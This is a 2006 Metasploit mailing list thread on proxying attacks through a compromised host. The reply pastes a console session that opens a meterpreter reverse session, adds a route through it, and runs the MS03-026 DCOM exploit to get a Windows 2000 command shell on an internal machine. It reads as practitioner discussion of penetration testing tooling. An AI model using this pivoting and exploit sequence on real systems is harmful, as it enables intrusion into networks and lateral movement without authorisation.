Metasploit mailing list archives
staging attack proxy
From: cbyrd01 at gmail.com (Chris Byrd)
Date: Fri, 10 Nov 2006 10:03:24 -0600
What you are looking for is the meterpreter payload. Once a system has meterpreter on it, you should be able to route future exploits through it using the route command. Here's a sample previously posted by mmiller: msf exploit(aggressive) > exploit -z [*] Started reverse handler [*] Sending 239 byte payload... [*] Transmitting intermediate stager for over-sized stage...(89 bytes) [*] Sending stage (2834 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (73739 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (10.142.43.3:5555 -> 10.142.43.2:3008) [*] Session 1 created in the background. msf exploit(aggressive) > route add 192.168.37.0 255.255.255.0 1 msf exploit(aggressive) > use windows/dcerpc/ms03_026_dcom msf exploit(ms03_026_dcom) > exploit [*] Started reverse handler [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.37.132[135] ... [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.37.132[135] ... [*] Sending exploit ... [*] Sending stage (474 bytes) [*] Command shell session 2 opened (10.142.43.3:5555 -> 10.142.43.2:3011) [*] The DCERPC service did not reply to our request Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32> I've had problems getting this to work myself, but I haven't tried it with the more recent versions. If you try it out, please let me know (or post on list) as to your results. Thanks! Chris On 11/10/06, Valter Santos <vsantola at gmail.com> wrote:
Folks, is there any support for staging attack proxies on metasploit (v2.7 or v3.0), searching the docs I don't see anything. What I want to mean with this is if it is possible to upload a "metasploit agent" to a compromised system and proxy attack through it (much in the terms of level1 agents on core impact). I think i read something about this for metasploit, but cannot find any info. cheers, /valter -- o Valter Santos o Security Analyst o INFOCON Tactical Overview: http://infocon.sectoid.com o PGP: 0xE2A4B206 o .. o Attack is the secret of defense; defense is the planning of an attack. o Sun Tzu, Art of War
Current thread:
- staging attack proxy Valter Santos (Nov 10)
- staging attack proxy Chris Byrd (Nov 10)
- staging attack proxy Jerome Athias (Nov 10)